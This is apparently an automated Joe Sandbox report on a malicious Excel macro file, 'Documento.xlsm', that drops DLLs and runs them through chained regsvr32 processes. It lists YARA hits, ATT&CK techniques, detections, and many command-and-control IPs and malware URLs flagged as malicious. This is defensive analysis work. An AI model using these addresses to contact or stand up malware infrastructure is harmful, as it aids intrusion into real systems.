                        Source: Yara matchFile source: 8.2.regsvr32.exe.190000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.regsvr32.exe.230000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.regsvr32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.regsvr32.exe.1a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.regsvr32.exe.180000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.regsvr32.exe.300000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.regsvr32.exe.260000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.regsvr32.exe.8d0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.regsvr32.exe.240000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.regsvr32.exe.7e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.regsvr32.exe.190000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.regsvr32.exe.230000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.regsvr32.exe.160000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.regsvr32.exe.150000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.regsvr32.exe.1c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000005.00000002.451757926.0000000000301000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.711848571.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.451639810.0000000000150000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.482255852.0000000000261000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.445708809.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.462225822.0000000000201000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.457525163.00000000008D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.445844665.0000000000231000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.467760078.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.462181637.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.467692271.0000000000190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.472981981.0000000000190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.457498778.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.435154889.0000000000160000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.473013320.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.482238250.0000000000230000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1002847B bind,3_2_1002847B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10010ED0 PeekMessageA,SendMessageA,_memset,recv,htons,SendMessageA,inet_ntoa,inet_ntoa,SendMessageA,inet_ntoa,SendMessageA,SendMessageA,htons,htons,SendMessageA,htons,SendMessageA,SendMessageA,SendMessageA,PeekMessageA,closesocket,socket,_memset,gethostbyname,inet_ntoa,inet_addr,setsockopt,htons,bind,WSAIoctl,closesocket,3_2_10010ED0

                        Mitre Att&ck Matrix

                        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                        Valid Accounts21
                        Scripting                        		Path Interception1
                        Access Token Manipulation                        		1
                        Disable or Modify Tools                        		21
                        Input Capture                        		2
                        System Time Discovery                        		Remote Services1
                        Archive Collected Data                        		Exfiltration Over Other Network Medium2
                        Ingress Tool Transfer                        		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                        System Shutdown/Reboot
                        Default Accounts1
                        Native API                        		Boot or Logon Initialization Scripts111
                        Process Injection                        		1
                        Deobfuscate/Decode Files or Information                        		LSASS Memory3
                        File and Directory Discovery                        		Remote Desktop Protocol21
                        Input Capture                        		Exfiltration Over Bluetooth1
                        Encrypted Channel                        		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                        Domain Accounts42
                        Exploitation for Client Execution                        		Logon Script (Windows)Logon Script (Windows)21
                        Scripting                        		Security Account Manager37
                        System Information Discovery                        		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                        Non-Standard Port                        		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)2
                        Obfuscated Files or Information                        		NTDS1
                        Query Registry                        		Distributed Component Object ModelInput CaptureScheduled Transfer1
                        Non-Application Layer Protocol                        		SIM Card SwapCarrier Billing Fraud
                        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script131
                        Masquerading                        		LSA Secrets21
                        Security Software Discovery                        		SSHKeyloggingData Transfer Size Limits11
                        Application Layer Protocol                        		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                        Replication Through Removable MediaLaunchdRc.commonRc.common1
                        Virtualization/Sandbox Evasion                        		Cached Domain Credentials1
                        Virtualization/Sandbox Evasion                        		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                        External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                        Access Token Manipulation                        		DCSync2
                        Process Discovery                        		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job111
                        Process Injection                        		Proc Filesystem1
                        Application Window Discovery                        		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                        Hidden Files and Directories                        		/etc/passwd and /etc/shadow1
                        Remote System Discovery                        		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 578182 Sample: Documento.xlsm Startdate: 24/02/2022 Architecture: WINDOWS Score: 100 57 129.232.188.93 xneeloZA South Africa 2->57 59 203.114.109.124 TOT-LLI-AS-APTOTPublicCompanyLimitedTH Thailand 2->59 61 42 other IPs or domains 2->61 77 Multi AV Scanner detection for domain / URL 2->77 79 Found malware configuration 2->79 81 Antivirus detection for URL or domain 2->81 83 13 other signatures 2->83 15 EXCEL.EXE 64 24 2->15         started        signatures3 process4 dnsIp5 65 www.swaong.com 15->65 67 waws-prod-dm1-143.sip.azurewebsites.windows.net 15->67 69 swaong-home.azurewebsites.net 15->69 49 C:\Users\user\xxw1.ocx, PE32 15->49 dropped 51 C:\Users\...\BRqk58WkNweubruYwrLOt[1].dll, PE32 15->51 dropped 53 C:\Users\user\Desktop\~$Documento.xlsm, data 15->53 dropped 71 Document exploit detected (creates forbidden files) 15->71 73 Document exploit detected (UrlDownloadToFile) 15->73 20 regsvr32.exe 2 15->20         started        file6 signatures7 process8 file9 55 C:\Windows\...\qzdpzpnlmhwmidn.sqj (copy), PE32 20->55 dropped 87 Hides that the sample has been downloaded from the Internet (zone.identifier) 20->87 24 regsvr32.exe 1 20->24         started        signatures10 process11 signatures12 91 Hides that the sample has been downloaded from the Internet (zone.identifier) 24->91 27 regsvr32.exe 1 24->27         started        process13 signatures14 95 Hides that the sample has been downloaded from the Internet (zone.identifier) 27->95 30 regsvr32.exe 1 27->30         started        process15 signatures16 97 Hides that the sample has been downloaded from the Internet (zone.identifier) 30->97 33 regsvr32.exe 1 30->33         started        process17 signatures18 75 Hides that the sample has been downloaded from the Internet (zone.identifier) 33->75 36 regsvr32.exe 1 33->36         started        process19 signatures20 85 Hides that the sample has been downloaded from the Internet (zone.identifier) 36->85 39 regsvr32.exe 1 36->39         started        process21 signatures22 89 Hides that the sample has been downloaded from the Internet (zone.identifier) 39->89 42 regsvr32.exe 1 39->42         started        process23 signatures24 93 Hides that the sample has been downloaded from the Internet (zone.identifier) 42->93 45 regsvr32.exe 2 42->45         started        process25 dnsIp26 63 135.148.121.246, 49168, 8080 AVAYAUS United States 45->63 99 System process connects to network (likely due to code injection or exploit) 45->99 signatures27

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        Documento.xlsm40%VirustotalBrowse
                        Documento.xlsm40%ReversingLabsDocument-Office.Downloader.Encdoc

                        Dropped Files

                        No Antivirus matches

                        Unpacked PE Files

                        SourceDetectionScannerLabelLinkDownload
                        10.2.regsvr32.exe.260000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        11.2.regsvr32.exe.240000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        3.2.regsvr32.exe.1a0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        8.2.regsvr32.exe.190000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                        9.2.regsvr32.exe.1e0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        7.2.regsvr32.exe.200000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        7.2.regsvr32.exe.180000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                        4.2.regsvr32.exe.230000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        11.2.regsvr32.exe.1d0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                        8.2.regsvr32.exe.1e0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        3.2.regsvr32.exe.160000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                        5.2.regsvr32.exe.300000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        9.2.regsvr32.exe.190000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                        6.2.regsvr32.exe.8d0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        6.2.regsvr32.exe.7e0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                        10.2.regsvr32.exe.230000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                        4.2.regsvr32.exe.1c0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                        5.2.regsvr32.exe.150000.0.unpack100%AviraHEUR/AGEN.1145233Download File

                        Domains

                        SourceDetectionScannerLabelLink
                        www.swaong.com5%VirustotalBrowse

                        URLs

                        SourceDetectionScannerLabelLink
                        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                        http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                        http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                        https://135.148.121.246/j100%Avira URL Cloudmalware
                        https://135.148.121.246:8080/zPDHHDvtYQmewTlUqnNumfvSgAMeHhZGhBefDhmgdqyEKfqwiccH~A100%Avira URL Cloudmalware
                        https://135.148.121.246:8080/zPDHHDvtYQmewTlUqnNumfvSgAMeHhZGhBefDhmgdqyEKfqwot~H100%Avira URL Cloudmalware
                        http://ocsp.entrust.net0D0%URL Reputationsafe
                        http://ocsp.entrust.net030%URL Reputationsafe
                        https://135.148.121.246/b100%Avira URL Cloudmalware

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        www.swaong.com
                        		unknown
                        		unknowntrueunknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://crl.pkioverheid.nl/DomOvLatestCRL.crl0regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.diginotar.nl/cps/pkioverheid0regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://135.148.121.246/jregsvr32.exe, 0000000B.00000002.711970606.00000000004BE000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        https://135.148.121.246:8080/zPDHHDvtYQmewTlUqnNumfvSgAMeHhZGhBefDhmgdqyEKfqwiccH~Aregsvr32.exe, 0000000B.00000002.711992789.00000000004E0000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        https://135.148.121.246:8080/zPDHHDvtYQmewTlUqnNumfvSgAMeHhZGhBefDhmgdqyEKfqwot~Hregsvr32.exe, 0000000B.00000002.711992789.00000000004E0000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://crl.entrust.net/server1.crl0regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://ocsp.entrust.net0Dregsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://ocsp.entrust.net03regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://secure.comodo.com/CPS0regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://crl.entrust.net/2048ca.crl0regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://135.148.121.246/bregsvr32.exe, 0000000B.00000002.711970606.00000000004BE000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              195.154.133.20
                              		unknownFrance
                              		12876OnlineSASFRtrue
                              185.157.82.211
                              		unknownPoland
                              		42927S-NET-ASPLtrue
                              79.172.212.216
                              		unknownHungary
                              		61998SZERVERPLEXHUtrue
                              212.237.17.99
                              		unknownItaly
                              		31034ARUBA-ASNITtrue
                              110.232.117.186
                              		unknownAustralia
                              		56038RACKCORP-APRackCorpAUtrue
                              51.254.140.238
                              		unknownFrance
                              		16276OVHFRtrue
                              119.235.255.201
                              		unknownIndonesia
                              		45146RAJASA-AS-ID-APPTRajaSepadanAbadiIDtrue
                              212.24.98.99
                              		unknownLithuania
                              		62282RACKRAYUABRakrejusLTtrue
                              213.190.4.223
                              		unknownGermany
                              		47583AS-HOSTINGERLTtrue
                              138.185.72.26
                              		unknownBrazil
                              		264343EmpasoftLtdaMeBRtrue
                              153.126.203.229
                              		unknownJapan7684SAKURA-ASAKURAInternetIncJPtrue
                              81.0.236.90
                              		unknownCzech Republic
                              		15685CASABLANCA-ASInternetCollocationProviderCZtrue
                              216.158.226.206
                              		unknownUnited States
                              		19318IS-AS-1UStrue
                              45.118.115.99
                              		unknownIndonesia
                              		131717IDNIC-CIFO-AS-IDPTCitraJelajahInformatikaIDtrue
                              103.75.201.2
                              		unknownThailand
                              		133496CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTHtrue
                              103.75.201.4
                              		unknownThailand
                              		133496CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTHtrue
                              209.126.98.206
                              		unknownUnited States
                              		30083AS-30083-GO-DADDY-COM-LLCUStrue
                              156.67.219.84
                              		unknownCyprus
                              		47583AS-HOSTINGERLTtrue
                              175.107.196.192
                              		unknownPakistan
                              		9541CYBERNET-APCyberInternetServicesPvtLtdPKtrue
                              217.182.143.207
                              		unknownFrance
                              		16276OVHFRtrue
                              82.165.152.127
                              		unknownGermany
                              		8560ONEANDONE-ASBrauerstrasse48DEtrue
                              107.182.225.142
                              		unknownUnited States
                              		32780HOSTINGSERVICES-INCUStrue
                              45.118.135.203
                              		unknownJapan63949LINODE-APLinodeLLCUStrue
                              50.116.54.215
                              		unknownUnited States
                              		63949LINODE-APLinodeLLCUStrue
                              131.100.24.231
                              		unknownBrazil
                              		61635GOPLEXTELECOMUNICACOESEINTERNETLTDA-MEBRtrue
                              135.148.121.246
                              		unknownUnited States
                              		18676AVAYAUStrue
                              46.55.222.11
                              		unknownBulgaria
                              		34841BALCHIKNETBGtrue
                              173.212.193.249
                              		unknownGermany
                              		51167CONTABODEtrue
                              178.79.147.66
                              		unknownUnited Kingdom
                              		63949LINODE-APLinodeLLCUStrue
                              45.176.232.124
                              		unknownColombia
                              		267869CABLEYTELECOMUNICACIONESDECOLOMBIASASCABLETELCOCtrue
                              162.243.175.63
                              		unknownUnited States
                              		14061DIGITALOCEAN-ASNUStrue
                              176.104.106.96
                              		unknownSerbia
                              		198371NINETRStrue
                              31.24.158.56
                              		unknownSpain
                              		50926INFORTELECOM-ASEStrue
                              50.30.40.196
                              		unknownUnited States
                              		30083AS-30083-GO-DADDY-COM-LLCUStrue
                              207.38.84.195
                              		unknownUnited States
                              		30083AS-30083-GO-DADDY-COM-LLCUStrue
                              164.68.99.3
                              		unknownGermany
                              		51167CONTABODEtrue
                              103.134.85.85
                              		unknownIndonesia
                              		139943IDNIC-GARUTKAB-AS-IDDinasKomunikasidanInformatikaKabupatrue
                              212.237.56.116
                              		unknownItaly
                              		31034ARUBA-ASNITtrue
                              45.142.114.231
                              		unknownGermany
                              		44066DE-FIRSTCOLOwwwfirst-colonetDEtrue
                              203.114.109.124
                              		unknownThailand
                              		131293TOT-LLI-AS-APTOTPublicCompanyLimitedTHtrue
                              129.232.188.93
                              		unknownSouth Africa
                              		37153xneeloZAtrue
                              159.8.59.82
                              		unknownUnited States
                              		36351SOFTLAYERUStrue
                              58.227.42.236
                              		unknownKorea Republic of
                              		9318SKB-ASSKBroadbandCoLtdKRtrue
                              158.69.222.101
                              		unknownCanada
                              		16276OVHFRtrue
                              178.128.83.165
                              		unknownNetherlands
                              		14061DIGITALOCEAN-ASNUStrue

                              General Information

                              Joe Sandbox Version:34.0.0 Boulder Opal
                              Analysis ID:578182
                              Start date:24.02.2022
                              Start time:13:53:10
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 11m 34s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Sample file name:Documento.xlsm
                              Cookbook file name:defaultwindowsofficecookbook.jbs
                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                              Number of analysed new started processes analysed:14
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.troj.expl.evad.winXLSM@19/11@1/45
                              EGA Information:
                              • Successful, ratio: 100%
                              HDC Information:
                              • Successful, ratio: 35.5% (good quality ratio 34%)
                              • Quality average: 75.3%
                              • Quality standard deviation: 25.4%
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 127
                              • Number of non-executed functions: 278
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Found application associated with file extension: .xlsm
                              • Changed system and user locale, location and keyboard layout to Italian - Italy
                              • Found Word or Excel or PowerPoint or XPS Viewer
                              • Attach to Office via COM
                              • Scroll down
                              • Close Viewer

                              Warnings

                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                              • Excluded IPs from analysis (whitelisted): 40.113.204.88, 173.222.108.210, 173.222.108.226
                              • Excluded domains from analysis (whitelisted): waws-prod-dm1-143.cloudapp.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, download.windowsupdate.com.edgesuite.net
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              13:53:30API Interceptor506x Sleep call for process: regsvr32.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              195.154.133.20d6DeL6cknP.dllGet hashmaliciousBrowse
                                CeKgLGF1Tb.dllGet hashmaliciousBrowse
                                  3pWWnQj8Tl.dllGet hashmaliciousBrowse
                                    d8BSu9cmyR.dllGet hashmaliciousBrowse
                                      HmcWSfD1nj.dllGet hashmaliciousBrowse
                                        XIjxexgAaA.dllGet hashmaliciousBrowse
                                          MDQcLDzNkn.dllGet hashmaliciousBrowse
                                            kvB0rO5hGC.dllGet hashmaliciousBrowse
                                              5MRdHqTI6h.dllGet hashmaliciousBrowse
                                                wZjcwGe2Ig.dllGet hashmaliciousBrowse
                                                  tmCYqAk7Pe.dllGet hashmaliciousBrowse
                                                    4Nbbmh92u0.dllGet hashmaliciousBrowse
                                                      cvNo36hSX08HcKblNvSOy.dllGet hashmaliciousBrowse
                                                        Ds8oyqwmawCIBaPnL8kACN1KhbDRMZ2B.dllGet hashmaliciousBrowse
                                                          ha23tmmqXf3ZPwkbb.dllGet hashmaliciousBrowse
                                                            jKpbCOfhGg1RRP.dllGet hashmaliciousBrowse
                                                              LJzRHsJ8Eg.dllGet hashmaliciousBrowse
                                                                KDbFxA40o9tAFDX9JJvwcCr0Qbwk.dllGet hashmaliciousBrowse
                                                                  klj7HiM3FcL8X83kS3JgE.dllGet hashmaliciousBrowse
                                                                    QTl6xoPjYe.dllGet hashmaliciousBrowse
                                                                      185.157.82.211d6DeL6cknP.dllGet hashmaliciousBrowse
                                                                        CeKgLGF1Tb.dllGet hashmaliciousBrowse
                                                                          3pWWnQj8Tl.dllGet hashmaliciousBrowse
                                                                            d8BSu9cmyR.dllGet hashmaliciousBrowse
                                                                              HmcWSfD1nj.dllGet hashmaliciousBrowse
                                                                                XIjxexgAaA.dllGet hashmaliciousBrowse
                                                                                  MDQcLDzNkn.dllGet hashmaliciousBrowse
                                                                                    kvB0rO5hGC.dllGet hashmaliciousBrowse
                                                                                      5MRdHqTI6h.dllGet hashmaliciousBrowse
                                                                                        wZjcwGe2Ig.dllGet hashmaliciousBrowse
                                                                                          tmCYqAk7Pe.dllGet hashmaliciousBrowse
                                                                                            4Nbbmh92u0.dllGet hashmaliciousBrowse
                                                                                              cvNo36hSX08HcKblNvSOy.dllGet hashmaliciousBrowse
                                                                                                Ds8oyqwmawCIBaPnL8kACN1KhbDRMZ2B.dllGet hashmaliciousBrowse
                                                                                                  ha23tmmqXf3ZPwkbb.dllGet hashmaliciousBrowse
                                                                                                    jKpbCOfhGg1RRP.dllGet hashmaliciousBrowse
                                                                                                      LJzRHsJ8Eg.dllGet hashmaliciousBrowse
                                                                                                        KDbFxA40o9tAFDX9JJvwcCr0Qbwk.dllGet hashmaliciousBrowse
                                                                                                          klj7HiM3FcL8X83kS3JgE.dllGet hashmaliciousBrowse
                                                                                                            QTl6xoPjYe.dllGet hashmaliciousBrowse

                                                                                                              Domains

                                                                                                              No context

                                                                                                              ASNs

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                              S-NET-ASPLd6DeL6cknP.dllGet hashmaliciousBrowse
                                                                                                              • 185.157.82.211
                                                                                                              CeKgLGF1Tb.dllGet hashmaliciousBrowse
                                                                                                              • 185.157.82.211
                                                                                                              3pWWnQj8Tl.dllGet hashmaliciousBrowse
                                                                                                              • 185.157.82.211
                                                                                                              d8BSu9cmyR.dllGet hashmaliciousBrowse
                                                                                                              • 185.157.82.211
                                                                                                              HmcWSfD1nj.dllGet hashmaliciousBrowse
                                                                                                              • 185.157.82.211
                                                                                                              XIjxexgAaA.dllGet hashmaliciousBrowse
                                                                                                              • 185.157.82.211
                                                                                                              MDQcLDzNkn.dllGet hashmaliciousBrowse
                                                                                                              • 185.157.82.211
                                                                                                              kvB0rO5hGC.dllGet hashmaliciousBrowse
                                                                                                              • 185.157.82.211
                                                                                                              5MRdHqTI6h.dllGet hashmaliciousBrowse
                                                                                                              • 185.157.82.211
                                                                                                              wZjcwGe2Ig.dllGet hashmaliciousBrowse
                                                                                                              • 185.157.82.211
                                                                                                              tmCYqAk7Pe.dllGet hashmaliciousBrowse
                                                                                                              • 185.157.82.211
                                                                                                              4Nbbmh92u0.dllGet hashmaliciousBrowse
                                                                                                              • 185.157.82.211
                                                                                                              cvNo36hSX08HcKblNvSOy.dllGet hashmaliciousBrowse
                                                                                                              • 185.157.82.211
                                                                                                              Ds8oyqwmawCIBaPnL8kACN1KhbDRMZ2B.dllGet hashmaliciousBrowse
                                                                                                              • 185.157.82.211
                                                                                                              ha23tmmqXf3ZPwkbb.dllGet hashmaliciousBrowse
                                                                                                              • 185.157.82.211
                                                                                                              jKpbCOfhGg1RRP.dllGet hashmaliciousBrowse
                                                                                                              • 185.157.82.211
                                                                                                              LJzRHsJ8Eg.dllGet hashmaliciousBrowse
                                                                                                              • 185.157.82.211
                                                                                                              KDbFxA40o9tAFDX9JJvwcCr0Qbwk.dllGet hashmaliciousBrowse
                                                                                                              • 185.157.82.211
                                                                                                              klj7HiM3FcL8X83kS3JgE.dllGet hashmaliciousBrowse
                                                                                                              • 185.157.82.211
                                                                                                              QTl6xoPjYe.dllGet hashmaliciousBrowse
                                                                                                              • 185.157.82.211
                                                                                                              OnlineSASFRDOCUMENTO-8152040270.xlsmGet hashmaliciousBrowse
                                                                                                              • 195.154.146.35
                                                                                                              XCcGVq3.dllGet hashmaliciousBrowse
                                                                                                              • 195.154.146.35
                                                                                                              d6DeL6cknP.dllGet hashmaliciousBrowse
                                                                                                              • 195.154.133.20
                                                                                                              CeKgLGF1Tb.dllGet hashmaliciousBrowse
                                                                                                              • 195.154.133.20
                                                                                                              3pWWnQj8Tl.dllGet hashmaliciousBrowse
                                                                                                              • 195.154.133.20
                                                                                                              d8BSu9cmyR.dllGet hashmaliciousBrowse
                                                                                                              • 195.154.133.20
                                                                                                              HmcWSfD1nj.dllGet hashmaliciousBrowse
                                                                                                              • 195.154.133.20
                                                                                                              XIjxexgAaA.dllGet hashmaliciousBrowse
                                                                                                              • 195.154.133.20
                                                                                                              8i2V.dllGet hashmaliciousBrowse
                                                                                                              • 195.154.146.35
                                                                                                              8PBVAmR7dTs.dllGet hashmaliciousBrowse
                                                                                                              • 195.154.146.35
                                                                                                              MDQcLDzNkn.dllGet hashmaliciousBrowse
                                                                                                              • 195.154.133.20
                                                                                                              kvB0rO5hGC.dllGet hashmaliciousBrowse
                                                                                                              • 195.154.133.20
                                                                                                              5MRdHqTI6h.dllGet hashmaliciousBrowse
                                                                                                              • 195.154.133.20
                                                                                                              wZjcwGe2Ig.dllGet hashmaliciousBrowse
                                                                                                              • 195.154.133.20
                                                                                                              tmCYqAk7Pe.dllGet hashmaliciousBrowse
                                                                                                              • 195.154.133.20
                                                                                                              4Nbbmh92u0.dllGet hashmaliciousBrowse
                                                                                                              • 195.154.133.20
                                                                                                              noqWxOGaK9.dllGet hashmaliciousBrowse
                                                                                                              • 195.154.146.35
                                                                                                              CBFR7N0JyYm6Fosovjh.dllGet hashmaliciousBrowse
                                                                                                              • 195.154.146.35
                                                                                                              cvNo36hSX08HcKblNvSOy.dllGet hashmaliciousBrowse
                                                                                                              • 195.154.133.20
                                                                                                              Ds8oyqwmawCIBaPnL8kACN1KhbDRMZ2B.dllGet hashmaliciousBrowse
                                                                                                              • 195.154.133.20

                                                                                                              JA3 Fingerprints

                                                                                                              No context

                                                                                                              Dropped Files

                                                                                                              No context

                                                                                                              Created / dropped Files

                                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                              Download File
